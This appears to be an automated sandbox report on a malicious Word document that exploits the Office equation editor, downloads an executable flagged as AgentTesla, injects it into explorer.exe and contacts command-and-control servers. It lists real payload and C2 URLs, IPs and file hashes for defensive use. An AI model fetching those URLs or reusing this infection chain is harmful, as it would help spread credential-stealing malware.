          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 552782 Sample: PO789.doc Startdate: 13/01/2022 Architecture: WINDOWS Score: 100 41 www.danielkcarter.store 2->41 59 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->59 61 Multi AV Scanner detection for domain / URL 2->61 63 Found malware configuration 2->63 65 17 other signatures 2->65 11 EQNEDT32.EXE 11 2->11         started        16 WINWORD.EXE 291 19 2->16         started        signatures3 process4 dnsIp5 49 peak-tv.tk 2.58.149.41, 49167, 80 GBTCLOUDUS Netherlands 11->49 33 C:\Users\user\AppData\...\medicomsh78694.exe, PE32 11->33 dropped 35 C:\Users\user\AppData\...\medicomzx[1].exe, PE32 11->35 dropped 83 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->83 18 medicomsh78694.exe 1 5 11->18         started        37 C:\Users\user\Desktop\~$PO789.doc, data 16->37 dropped 39 ~WRF{828CF0EA-BCAC...1-FE0BC8A11CE4}.tmp, Composite 16->39 dropped file6 signatures7 process8 signatures9 51 Multi AV Scanner detection for dropped file 18->51 53 Machine Learning detection for dropped file 18->53 55 Tries to detect virtualization through RDTSC time measurements 18->55 57 Injects a PE file into a foreign processes 18->57 21 medicomsh78694.exe 18->21         started        process10 signatures11 67 Modifies the context of a thread in another process (thread injection) 21->67 69 Maps a DLL or memory area into another process 21->69 71 Sample uses process hollowing technique 21->71 73 Queues an APC in another process (thread injection) 21->73 24 explorer.exe 21->24 injected process12 dnsIp13 43 www.realstakepool.com 91.195.240.13, 49172, 80 SEDO-ASDE Germany 24->43 45 shops.myshopify.com 23.227.38.74, 49168, 80 CLOUDFLARENETUS Canada 24->45 47 4 other IPs or domains 24->47 75 System process connects to network (likely due to code injection or exploit) 24->75 28 msdt.exe 24->28         started        signatures14 process15 signatures16 77 Modifies the context of a thread in another process (thread injection) 28->77 79 Maps a DLL or memory area into another process 28->79 81 Tries to detect virtualization through RDTSC time measurements 28->81 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO789.doc58%VirustotalBrowse
          PO789.doc54%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp100%AviraEXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\medicomsh78694.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe34%MetadefenderBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe51%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          C:\Users\user\AppData\Roaming\medicomsh78694.exe34%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\medicomsh78694.exe51%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.0.medicomsh78694.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.medicomsh78694.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.medicomsh78694.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.medicomsh78694.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          peak-tv.tk5%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.realstakepool.com/md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i0%Avira URL Cloudsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.prestigiousuniforms.com/md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i0%Avira URL Cloudsafe
          www.carbonfiber.cloud/md4m/0%Avira URL Cloudsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://peak-tv.tk/medicomzx.exe100%Avira URL Cloudmalware
          http://www.small-icons.com/packs/16x16-free-application-icons.htm0%Avira URL Cloudsafe
          http://splashyfish.com/icons/0%Avira URL Cloudsafe
          http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i100%Avira URL Cloudmalware
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://led24.de/iconset/0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i100%Avira URL Cloudmalware
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          peak-tv.tk
          		2.58.149.41
          		truetrueunknown
          www.extraordinarymiracle.com
          		109.94.209.123
          		truetrue
            		unknown
            www.realstakepool.com
            		91.195.240.13
            		truetrue
              		unknown
              shops.myshopify.com
              		23.227.38.74
              		truetrue
                		unknown
                muzicalbox.com
                		34.102.136.180
                		truefalse
                  		unknown
                  www.danielkcarter.store
                  		172.67.181.75
                  		truefalse
                    		unknown
                    www.muzicalbox.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.prestigiousuniforms.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.realstakepool.com/md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90itrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.prestigiousuniforms.com/md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90itrue
                        • Avira URL Cloud: safe
                        		unknown
                        www.carbonfiber.cloud/md4m/true
                        • Avira URL Cloud: safe
                        		low
                        http://peak-tv.tk/medicomzx.exetrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.muzicalbox.com/md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90ifalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.extraordinarymiracle.com/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90itrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://investor.msn.comexplorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpfalse
                              		high
                              http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.434207540.000000000031D000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.445067687.000000000031D000.00000004.00000020.sdmpfalse
                                		high
                                https://visualpharm.com/must_have_icon_set/medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                  		high
                                  https://github.com/proviq/lusrmgr/Chttps://github.com/proviq/lusrmgrmedicomsh78694.exe, 00000004.00000002.423480427.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000004.00000000.408501370.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                    		high
                                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmpfalse
                                      		high
                                      https://github.com/proviq/lusrmgrmedicomsh78694.exefalse
                                        		high
                                        http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpfalse
                                          		high
                                          http://treyresearch.netexplorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmpfalse
                                            		high
                                            http://p.yusukekamiyamane.com/medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                              		high
                                              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpfalse
                                                		high
                                                http://java.sun.comexplorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://github.com/proviq/lusrmgr/medicomsh78694.exefalse
                                                  		high
                                                  http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmpfalse
                                                    		high
                                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.small-icons.com/packs/16x16-free-application-icons.htmmedicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://splashyfish.com/icons/medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaexplorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.msn.com/?ocid=iehp01lexplorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://investor.msn.com/explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpfalse
                                                            		high
                                                            http://www.msn.com/?ocid=iehpexplorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.gnome.org/medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                                                  		high
                                                                  http://www.fatcow.com/free-icons/medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                                                    		high
                                                                    http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.512214030.00000000002C7000.00000004.00000020.sdmpfalse
                                                                      		high
                                                                      http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      http://led24.de/iconset/medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.%s.comPAexplorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		low
                                                                      http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpfalse
                                                                        		high
                                                                        https://support.mozilla.orgexplorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmpfalse
                                                                          		high
                                                                          http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.427812098.0000000003E50000.00000002.00020000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		low

                                                                          Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          2.58.149.41
                                                                          		peak-tv.tkNetherlands
                                                                          		395800GBTCLOUDUStrue
                                                                          23.227.38.74
                                                                          		shops.myshopify.comCanada
                                                                          		13335CLOUDFLARENETUStrue
                                                                          34.102.136.180
                                                                          		muzicalbox.comUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          109.94.209.123
                                                                          		www.extraordinarymiracle.comRussian Federation
                                                                          		202376ARVID-LOGICUMEEtrue
                                                                          91.195.240.13
                                                                          		www.realstakepool.comGermany
                                                                          		47846SEDO-ASDEtrue

                                                                          General Information

                                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                                          Analysis ID:552782
                                                                          Start date:13.01.2022
                                                                          Start time:18:16:09
                                                                          Joe Sandbox Product:CloudBasic
                                                                          Overall analysis duration:0h 12m 44s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:light
                                                                          Sample file name:PO789.doc
                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                          Number of analysed new started processes analysed:10
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:1
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • HDC enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.expl.evad.winDOC@9/9@6/5
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HDC Information:
                                                                          • Successful, ratio: 14.9% (good quality ratio 13.9%)
                                                                          • Quality average: 68.4%
                                                                          • Quality standard deviation: 29.6%
                                                                          HCA Information:
                                                                          • Successful, ratio: 96%
                                                                          • Number of executed functions: 0
                                                                          • Number of non-executed functions: 0
                                                                          Cookbook Comments:
                                                                          • Adjust boot time
                                                                          • Enable AMSI
                                                                          • Found application associated with file extension: .doc
                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                          • Attach to Office via COM
                                                                          • Scroll down
                                                                          • Close Viewer
                                                                          Warnings:
                                                                          Show All
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                          • TCP Packets have been reduced to 100
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          18:16:18API Interceptor36x Sleep call for process: EQNEDT32.EXE modified
                                                                          18:16:20API Interceptor86x Sleep call for process: medicomsh78694.exe modified
                                                                          18:16:44API Interceptor138x Sleep call for process: msdt.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          No context

                                                                          Domains

                                                                          No context

                                                                          ASN

                                                                          No context

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:downloaded
                                                                          Size (bytes):707072
                                                                          Entropy (8bit):7.1557818019777
                                                                          Encrypted:false
                                                                          SSDEEP:6144:Y+xYKKAB5ADeIVvcDK8OpvlmXsC2GxfjpWHpxFvMUXvoHVgDaiYCpslXGqoohdZy:Y+bYeIVwl5dCWdloqXkz53iA55suuI
                                                                          MD5:8807C2E0F2973A22812AF6E61BA72667
                                                                          SHA1:20BDCA62A8D0C98F8DB2C9FF1E3AB13DC4849514
                                                                          SHA-256:4228CCE8278F840721D9F04FEA140B942C14D45938D07C1FA36A29712DDA441C
                                                                          SHA-512:05AF426C3133B5B71F74E6754C139ACD8BAA6C3A492719C223403C9F859CDF9EFE12739D8B35C9CB2E4126FA54080E91894AB6A40E417894EF14A218B88FA527
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Metadefender, Detection: 34%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 51%
                                                                          IE Cache URL:http://peak-tv.tk/medicomzx.exe
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............P.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......................$...`#............................................("...*&..(#....*.s$........s%........s&........s'........s(........*...0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*.0...........~....o,....+..*.0...........~....o-....+..*.0..<........~.....(......,!r...p.....(/...o0...s1............~.....+..*.0...........~.....+..*".......*.0..&........(....r%..p~....o2...(3.....t$....+..*Vs....(4...t.........*..(5...*.0..........
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                          Category:dropped
                                                                          Size (bytes):5632
                                                                          Entropy (8bit):4.123128557938953
                                                                          Encrypted:false
                                                                          SSDEEP:96:SB9fMP/FyI+brWXL9TQ9IJp0Mhrq/2BpWYjuGFkZu:SB9UP/SrWXLiWaMYOPOF
                                                                          MD5:6D550004A108E472ACB60AFA74AECBAD
                                                                          SHA1:A43A215E06FEAA84FD26BBB00439A041448B484A
                                                                          SHA-256:5B58844E1C55D5D069C4E7D10EF267AD2F0C93E239265FD8FB51930CED238C6C
                                                                          SHA-512:3CFD4B10E88C6CA7B31AA12BAC4B2642DFC50B426A0A597D2A836578A3A3C4FD4F90756A3FCE2AC43A52AB1E46FA356D7BA3F7AA0962B0D024131504A7CF1E8A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8CA50CAD-0168-40C5-9DE5-3A2EB92A8144}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1024
                                                                          Entropy (8bit):0.05390218305374581
                                                                          Encrypted:false
                                                                          SSDEEP:3:ol3lYdn:4Wn
                                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                          Malicious:false
                                                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A1ACA359-D73C-4E90-86E8-AE0089CF8F67}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):9216
                                                                          Entropy (8bit):3.481183177856214
                                                                          Encrypted:false
                                                                          SSDEEP:192:o3uVHzr2R9THXsibKVEbyKbQTjKiqeOCs0XqK2WP1vTOkpc76EnZ:o+VzrkBNPecQTee/aK2+OEiZ
                                                                          MD5:1ED77075EA7EA8E9B6386E63B1F8F682
                                                                          SHA1:7F3E9A5B4FEC84D3298D32A6BB1D8A8E89866C24
                                                                          SHA-256:AB2DDDC94896F581777EA638395F5FAC4F42F368AEC3932BDF1EDA21328B5866
                                                                          SHA-512:E58451151D174E46965E7DD18D785A273571BE2CAADC2F86C97E695EBD7C2AD4967D8C15DA14C7705023E64B4B330201A374080F759C6D9A24B3227AD083699C
                                                                          Malicious:false
                                                                          Preview: ..%.^.@.+.*.&.7.8.-.[./.?._.?.,.0...6.3.8.<.~.-.6.?.%.'.;.[...1.,.#.3.5.-.4.#.^.`...?.?...@.[.3._...4.,.3.3.&.1.$./.9.*.].'.7.?.*.?.%.~.+.6.?.0...@.!.?._.'.6.).5.-.>.?.$.].~.+.:.;.*.,...;.?.../.1.&.4.6.|.'._.+.].?.?.!.`.?.[.+.*.;.=.@.?.?.|.'.?.7.9.'.%.+.;.%.?.=.~.'.|.,.+...$.6.?.?.%.*.1.(.$.9.?.,.`.?.,.;...;.].&.%.*.!._.5.6.6.=.#.#.@._.|.~.+./.%.5.$.?.%.$.1.9.0.`.%.'.3.0.,.+.%.7.=.|...[.:...,.?.].1.8.[.<.1.~.>.)...?.>.3.#.*.,...?.`.4.1.@.2.7.?.3...#.;.@.;.2._.?.6.0.1.4.~.#.%.@.0.+.(.>.5.0.>.4.-.=.'.;...&.#.7.&.:.4.=.&.4...!.?.8.*.]._.:.>.2.%.*.2...>.3.|...6.=.9.%.:.6.-.`.`.$.+...?.$...3.;.#./.9.8...-.!.8.+.2.^.:.8.;.?.?./...7.%.....<.?.^.~.3.7.~.(.@.,.;.;.2.'.#.5.?.$.?.&.6.>.(.<.'._._.`.,.+.[.-.;.'.*.2...[.....>.?.5.$...1.:.?.?.!.5.0.@.).[.>._.&.=.?.?.8...;.`.0.-._.`...*.?._.!.^.%...&...?.8.%.+.;.-...`.3._.3...?.?.^...'.].>.3.$.@.?.*.?.?...?.,.`.5.$.^.?.?.$._.?...#./.>.%./.!.9.^.|.@.;.=.8.!.(.9.4...%.8.].[.?.?.?.!.3.[.1.-.>.>.7.?.@.2.^.+.+...?.7.<.3.-.].[.1.8.$.?.,.0.^.:.=.?.%.5.*.).8.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO789.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Fri Jan 14 01:16:16 2022, length=21489, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):985
                                                                          Entropy (8bit):4.502552260196471
                                                                          Encrypted:false
                                                                          SSDEEP:12:81exRgXg/XAlCPCHaXeBhB/OW9qX+WvvTicvbp04loDtZ3YilMMEpxRljK2QMTd+:8an/XTuzLINGeHoDv3qSAQd7Qy
                                                                          MD5:8BDC5B1FDC8B42BFCED301566877791E
                                                                          SHA1:D296ED0B91FA1FD37358AD09E026DD88C1270962
                                                                          SHA-256:65F2C698BA65C4FD314A4470EC3940F5EA2CD6E1C19AC315D0DF1932FEE46F3C
